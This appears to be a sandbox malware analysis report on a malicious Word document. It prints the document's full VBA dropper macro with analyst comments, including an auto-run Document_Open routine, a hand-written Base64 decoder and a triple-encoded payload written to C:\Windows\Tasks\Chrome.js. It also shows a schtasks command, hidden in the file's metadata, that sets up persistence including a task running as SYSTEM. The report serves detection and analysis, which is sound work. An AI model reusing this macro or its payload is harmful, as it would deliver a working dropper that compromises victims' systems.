VTI SCORE: 100/100
Dynamic Analysis Report |
Classification: - |
b22d7b196ca03b43f9b140732a3d317f328e5d5f53379c2520a0f05a17d6e617 (SHA256)
CV gui PVN vv y kien cua UB ve gia han.doc
Word Document
Created at 2019-01-08 12:39:00
This is a filtered view
This list contains only the embedded files and created files
Filename | Category | Type | Severity | Actions |
---|
C:\Users\aETAdzjz\Desktop\CV gui PVN vv y kien cua UB ve gia han.doc | Sample File | Word Document |
Suspicious
Office Information
Description | cmd /c schtasks /create /sc MINUTE /tn "Chrome" /tr "C:\Windows\Tasks\Chrome.js" /mo 2 /F & schtasks /create /sc MINUTE /tn "Chrome" /tr "C:\Windows\Tasks\Chrome.js" /mo 2 /RU SYSTEM |
Creator | A |
Last Modified By | Win7 |
Revision | 7 |
Create Time | 2019-01-04 01:08:00+00:00 |
Modify Time | 2019-01-08 15:02:00+00:00 |
Document Information
Application | Microsoft Office Word |
App Version | 16.0000 |
Template | Normal |
Document Security | SecurityFlag.NONE |
Editing Time | 18.0 |
Page Count | 1 |
Line Count | 10 |
Paragraph Count | 2 |
Word Count | 222 |
Character Count | 1269 |
Chars With Spaces | 1489 |
Heading Pairs | Title |
ScaleCrop | |
SharedDoc |
VBA Macros (1)
Macro #1: ThisDocument
' Module header as exported by the sandbox. VB_Name = "ThisDocument" identifies this as
' the document's own class module, which is where Word's auto-exec handlers such as
' Document_Open live; the remaining attributes look like the standard export set for
' ThisDocument (predeclared, exposed, template-derived) rather than anything sample-specific.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Decodes a Base64 string into a VBA String, one Chr() per decoded byte.
' Parameters:
'   B64 - Base64 text in the standard alphabet (A-Z, a-z, 0-9, +, /), with or without "=" padding.
' Returns: the decoded bytes as a String. On any runtime error the handler at `over`
'   exits silently and whatever has been accumulated so far (possibly "") is returned.
' NOTE(analysis): a hand-rolled decoder instead of an MSXML/ADODB call means no library
' reference appears in the project; treat this purely as the decoding primitive used by
' Document_Open below.
Function Base64Decode(B64 As String) As String
' Any error (unknown character, Null from Switch, etc.) jumps to `over` with no report.
On Error GoTo over
Dim OutStr() As Byte, i As Long, j As Long
' Alphabet; "=" is included only so InStr never returns 0 for it. Padding is stripped next.
Const B64_CHAR_DICT = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
' Drop everything from the first "=" onward so the tail is handled via `mods` instead.
If InStr(1, B64, "=") <> 0 Then B64 = Left(B64, InStr(1, B64, "=") - 1)
' `kk` is declared (as Variant) but never referenced.
Dim kk, length As Long, mods As Long
' mods = leftover characters after the last full quartet (0, 2 or 3 are meaningful);
' length = number of characters that form complete quartets.
mods = Len(B64) Mod 4
length = Len(B64) - mods
' 3 output bytes per quartet plus 0/1/2 extra bytes for a 0/2/3-character tail.
' For mods = 1, Switch has no matching case and returns Null, so this line raises and the
' error handler returns "" - presumably never hit with the well-formed literal in Document_Open.
ReDim OutStr(length / 4 * 3 - 1 + Switch(mods = 0, 0, mods = 2, 1, mods = 3, 2))
For i = 1 To length Step 4
Dim buf(3) As Byte
' Map the 4 characters of this quartet to their 6-bit values (InStr is 1-based, hence -1).
For j = 0 To 3
buf(j) = InStr(1, B64_CHAR_DICT, Mid(B64, i + j, 1)) - 1
Next
' Repack four 6-bit values into three 8-bit bytes; the masks keep each division exact.
OutStr((i - 1) / 4 * 3) = buf(0) * &H4 + (buf(1) And &H30) / &H10
OutStr((i - 1) / 4 * 3 + 1) = (buf(1) And &HF) * &H10 + (buf(2) And &H3C) / &H4
OutStr((i - 1) / 4 * 3 + 2) = (buf(2) And &H3) * &H40 + buf(3)
Next
' Tail handling: 2 leftover characters yield 1 byte, 3 leftover characters yield 2 bytes.
If mods = 2 Then
OutStr(length / 4 * 3) = (InStr(1, B64_CHAR_DICT, Mid(B64, length + 1, 1)) - 1) * &H4 + ((InStr(1, B64_CHAR_DICT, Mid(B64, length + 2, 1)) - 1) And &H30) / 16
ElseIf mods = 3 Then
OutStr(length / 4 * 3) = (InStr(1, B64_CHAR_DICT, Mid(B64, length + 1, 1)) - 1) * &H4 + ((InStr(1, B64_CHAR_DICT, Mid(B64, length + 2, 1)) - 1) And &H30) / 16
OutStr(length / 4 * 3 + 1) = ((InStr(1, B64_CHAR_DICT, Mid(B64, length + 2, 1)) - 1) And &HF) * &H10 + ((InStr(1, B64_CHAR_DICT, Mid(B64, length + 3, 1)) - 1) And &H3C) / &H4
End If
' Bytes -> String via Chr(); how values above 127 map to characters may depend on the
' system code page, so this is a text-oriented decoder, not a byte-exact one.
For i = 0 To UBound(OutStr)
Base64Decode = Base64Decode & Chr(OutStr(i))
Next i
' Error-handler target: nothing is logged or raised; the function simply returns what it has.
over:
End Function
' Auto-exec handler: Word runs Document_Open when the document is opened with macros enabled.
' What the code below does, in order: (1) decode a triply Base64-encoded payload,
' (2) write it to C:\Windows\Tasks\Chrome.js, (3) pass the value of the document's built-in
' "Comments" property to Shell. The launch command therefore lives in document metadata,
' not in the macro; the report's Office Information "Description" field shows a schtasks
' command that appears to be that property's value (confirm against the sample's metadata).
' Detection (defender view): winword.exe creating a file under C:\Windows\Tasks, and
' winword.exe spawning cmd.exe / schtasks.exe, are both high-signal for this sample.
Private Sub Document_Open()
Dim strBs0 As String
Dim strBs1 As String
Dim strBs2 As String
Dim strBs3 As String
' Encoded payload. It is Base64-encoded three times over (see the three decode calls below).
strBs0 = "WkcxR2VVbEhUVGxLTWs1SVQxUk9ZVmRGY0RaWlZXUlhZekpLUkZGWVVtbGlWR3d6VTFWTmVHSkhWa2hXYlhCS1VqQnZNVmt3WkVkbGJVNDFVVmhTV21WVlJuQlRhMmhLVDFaam" & _
"VGUnFWbXBOTVVweldXeE5NVlF4Y0ZsVldGWlhUV3hhY0ZaWE1WZGxSMUpZVm01d2ExSnFRVEpVTW5SUFpWWndXRkpxUW1GVk1tUjFXVlZvVTAxSFRrVmlNMXBOWld0VmVGUnJUV" & _
"EJsUlRWd1RraHdUMlZVVWpSVVYzQktaR3hKZVU5WVdtRk5ibWh6Vm14b1EyRXhiRmxWYlhoTlRWWmFNMWRyWkVkTlJuQlVUbGhrYUZORlJuVlRNVko2V2pCd1NWTnRlR3BOTUVV" & _
"MVUydG9TbVJXU1hsV2FrSldZbFphTmxrd1l6VmtWMDE1VmxjNVRGWklUbkpaTWpGWFpXMU9TVlJxUW1waVZscHZXV3hSZDJFeVRuUldibkJxVVhwV1NWZHNhRk5WTVhCWlZHNWt" & _
"hVTFxVmpaWGJGcFBUVWRPZEZadGFHbFZNbVIzVkROc1FtRXlUWHBUVkd4cFlsWlplbFJHWXpWaFYwWjBWbTF3YTFFd1NsVmFWbWhQVFVad1dFMUlWbFJXVkdneFZsUk9VMlZXY0" & _
"ZoU2JsSldZbFphYjFkclpGZGxWV3hFVlc1c1lWZEZOVE5aZWs1VFpWWndXRkp1VWxCbFZVWnlWVlJKZUdFeFFsUlZibkJxWVZSV1ZGZHNaRWRoTVZwSVQxVmFhV0pXUm5aVE1WS" & _
"jZZVEZGZVUxWGRGRldibEpWV2xab1QwMUdjRmhOU0ZaWFVqRlpNRnBGVFRGU2JVcDBWRzVhWVZJeWVERlhha1YzVG1zNWMxWnNWbE5oYldReFZXcEtWMDFHVlhwVmJteG9WbnBX" & _
"ZFZNd1dqQldSMVpaVkdwQ1lWWjZRakZWVkVrMVpGZFNkRlp1Ykd0U2FrRXlWREowWVdWWFNYbE5WVTVhVjBVMWMxUnRjRk5XUjFKSlUyNUNhV0pYVG5aVGExWlBaRVp3UkdFelF" & _
"sQmxWVVp5VjFSSmVHRXhVWHBXYWtKUlZsZDRNVnBITURWamJIQlVUVlZhYkZORlNqVlhiR2hQWlcxR1dFOVlWa3BSZWtaRldXcEplR1JHYkZoT1YzUlFZVlpLUlZsc1pGTlBSbE" & _
"Y2Vm1wQ1RWWnJOSGRaTWpGelpGWndObU15ZEZaaVZscEZXV3hrVWs5V1kzZFVibHBwWW14d2Mxa3lOVk5hUlRseFkwWldhVTFGY0c5WmVrcFdUV3MxUjFScVFtcGlWM2d4VjI1c" & _
"2IxbHNWWHBpU0hCclVqRmFNRlJIZUZOaVIxWkpWVmhXVTFaNlZuRlpha3BUWTBkS2RGcEhVbEJoYmtKWFZtdFdXazVGZUhKYVIzaHJVbFZ2TVZwRlpGZGxhM1JFVlcxd2FWWXhT" & _
"bEZhUm1oU1kwVjBWV015ZEd0WFJscDNWMnRSZUZOdFNuVlhibHBvVFd4V01GVnNhRzlrTWs1MFZtNXdhazF0ZURKWmJXeENaRVpGZVU5WVVtbFdNRm94VjJ0U2RtSnRVWGxOV0V" & _
"KYVpWVktjVmw2VGtObFYwbDVWV3BHV2sweFJtNVhha3BYVFVWc1NWWnFSbWhXTVVaMVdtdFZOVTFYVWtSTlZsSnJVMFZ3ZDFsdE1XcE9NSEJIVTIxNGExWXllSEpWUmxvd1VrZE" & _
"plVTVVU21GWFJXOTNWMFpTZGs1c1draFBWVTVhVjBVMWMxUnRjRk5XUjFKSlUyNUNhV0pYVG5aV2VrWlBUbGROZWxWdGVHbFZlbFpXVjJ4b2IwMUZlSEpXYmxaYVRXcHNjbGxXW" & _
"XpGaWJHaFZZbnBhVjFac1NraFVNRTB4VTBad1dWVnJUbXhYUmtweldUTnNibUV5VWxsV2JrSmhVVEowZDFRemJGTlZWMUpaVkc1T1VWVXdSblZaVldoVFRVZE9SV0l6V2sxbGEx" & _
"VjRWR3ROTUdWRk5YQk9TSEJQWlZSU05GUlhjRXBrYkVsNVQxaGFZVTF1YUhOV2JHaERZVEZzV1ZWdGVFMU5SMUl5V1dwS2EyTXhjRlJPV0dSb1UwVkZkbFpHWkVkaGJFSlVXWHB" & _
"rUzFKclNYaFpla296VDFWd1IxRnFSbXBOYm1SNVUydGFTMkpIVWxoaVIzUlFaVlpLVWxwR2FFOWpNVUpVVld4R2ExZEZOWHBUTTJ4cVRERktTRkpxUWxwV1JFSjFWRE5zVTFWWF" & _
"VsbFViazVSVlRGS1VscEdhRTlqTUhRMVZXeE9ZVlpWTlRCWGExSXdXV3hWZW1KSWNHdFNNVm93VkVkek1XSkhVa1JPVm1oaFZqQndWRmRzYUVkTlZuQlpWR3BDV1ZVeFNYcFhiR" & _
"1JMVlRGd1dWSnFSbUZYUlRSM1ZVWmFNRlpIVmxsVWFrSmhWbnBDTVZaSE1WZE5SWGh6V2tkNFdtSkZjSE5aTVdoWFlrZE5lbFZ0VWxCaGJrSkZXVEl4VjJGSFVraFdWemxMVW10SmVGbDZTak5qUlRrMVZXcE9ZVll3Y0ZSWGJHaEhUVlp3V1ZScVFrMWhla1p6V2tWa2IyUnNjRVZOUnpWV1VsUnNWVlpyVG1wT01IQkpXa2Q0V21KRmNITlpNV2hYWWtkTmVsVll" & _
"WbE5OYkZsM1ZsY3hWMlZ0VGtoUFdGWnFUV3hXZGxNeFVucGhWVGt6VUZRd2JrOTNjRVZSYWxrd1NVUXdaMXB1Vm5WWk0xSndZakkwYjJONWEyZGxkMjluU1VOQloyUnRSbmxKUjFVNVpUTXdjMkZUZUdsUVZFRnpXWGw0TkV4SGR6bE5RM2hvVEVoSk9VcDVZM05rZWpGVVpFaEtjR0p0WTNWYWJrcDJZbFZPYjFsWVNrUmlNbEpzVEVWM09XTjVOWE5hVnpWdVpFZ" & _
"G5OME5wUVdkSlEwSXlXVmhKWjFGVU1HbFJWVXBFVWtWV1IxSXdhRXBUYTNSTlZGVTFVRlZHUmxOVk1WSldWbXhrV1ZkV2NHaFpiVTVyV2xkYWJtRkhiSEZoTW5oMFltMDVkMk5ZU25wa1NGWXlaRE5vTldWcVFYaE5hazB3VGxSWk0wOUVhM0pNZVVrM1EybEJaMGxEUW0xaU0wbHZZVlF3ZDA4eWF6aE9hbEUzWVZOemNrdFlkR3hYTUVWMVdUSm9hR05yUmpCTFI" & _
"ydHdXRlF4Y0U4ek1FdEpRMEZuU1VkYWRtTnBhRFJRVkVFM1pVUjRUVTh6WjNKTGVXdzNRMmxCWjBsRFFXZEpRMEZuV1hveGJGY3pUWFZaTW1ob1kydEdNRXRJWjNCWVZIUnBVRk5vYVZCRWR6SkxVM1JxVHpKM2NsQlVXVGREYVVGblNVTkJaMGxEUVdka01taHdZa2RWYjJKRU5EbFBRMnczUzBOb2FGQlRhR2xRYWpRclMwZDNkRkJVWjNCTFUxbDNaVWRhYlV0W" & _
"WVEaExTR2M0UzBWM2RFMXBhM0JMVTFsdFMwaEpjbEJZWTI5WlUydHdUek13UzBsRFFXZEpTREJMU1VOQlowbElTbXhrU0ZaNVltbENlVTkzY0RsUGQzQXlXVmhKWjJJeVNuRlZNbWhzWWtkM09XSnRWak5KUlVacVpFZHNNbHBXYUZCWmJYQnNXVE5SYjBsc1pGUlpNMHB3WTBoUmRWVXlhR3hpUjNkcFMxUnpTMlJ0Um5sSlIyeFRXbGhTTVdOdE5VUmlNbEpzVUZ" & _
"jNWFXRnNUbTlhVjNoelRHeEtNV0pwYUVWUmFsa3dTMGROY0V4RVFYTmFiVVp6WXpKVmNFOTNQVDA5"
' Three decode passes; the layering presumably exists to defeat single-pass decoders in
' scanners, since one pass still yields Base64 text rather than the script.
strBs1 = Base64Decode(strBs0)
strBs2 = Base64Decode(strBs1)
strBs3 = Base64Decode(strBs2)
' Writes the decoded script to the VBA Immediate window only; likely a leftover from development.
Debug.Print strBs3
Dim fso As Object
' Late-bound FileSystemObject via CreateObject (no project reference needed).
Set fso = CreateObject("Scripting.FileSystemObject")
Dim Fileout As Object
' CreateTextFile(path, overwrite, unicode): drops the decoded payload as a Unicode text file
' under C:\Windows\Tasks, overwriting any existing Chrome.js. This write is the first
' observable host artefact of the sample.
Set Fileout = fso.CreateTextFile("C:\Windows\Tasks\Chrome.js", True, True)
Fileout.Write strBs3
Fileout.Close
Dim dp As DocumentProperty
' The command to run is not in the code: walk the built-in document properties and
' execute the value of "Comments". Storing it in metadata keeps the string out of the
' VBA project, which is where most macro scanners look.
For Each dp In ActiveDocument.BuiltInDocumentProperties
If dp.Name = "Comments" Then
' Shell executes the property value as a command line with no user interaction.
Shell (dp.Value)
End If
Next
End Sub
YARA Matches
Rule Name | Rule Description | Classification | Severity | Actions |
---|---|---|---|---|
VBA_Create_File | VBA macro contains file creation commands; possible dropper | - |
3/5
VBA_Create_File | VBA macro contains file creation commands; possible dropper | - |
3/5
49d2bc305daf1fcca84d6a282e52d1dfd2d79e9ca9f96a3a435d058ae2d8f755 | Embedded File | XML |
Whitelisted
File Reputation Information
Severity |
Whitelisted
First Seen | 2013-04-24 20:22 (UTC+2) |
Last Seen | 2018-08-16 17:44 (UTC+2) |
c97833e6456aa2bfe9be614f9c3ae41a8ef764b1cc3af92c6a6f273c62309122 | Embedded File | XML |
Whitelisted
File Reputation Information
Severity |
Whitelisted
First Seen | 2012-11-16 07:03 (UTC+1) |
Last Seen | 2019-01-06 12:21 (UTC+1) |
5312661b9e1d78deefa38ba96b6ffa090d005472235ff083b54dde9d73a56276 | Embedded File | Text |
Unknown
52262bb315fa55b7441a04966e176b0e26b7071376797e35c80aa60696b6d6fc | Embedded File | Unknown |
Unknown
b6a2282545ac0eac69c91f9092d9109c993527d1f0e03b0457acc5721fe12175 | Embedded File | XML |
Unknown
81d22ccf51ee4c30533dd16600b90ae1b17310ec88d17348eccba08cdb4528eb | Embedded File | XML |
Unknown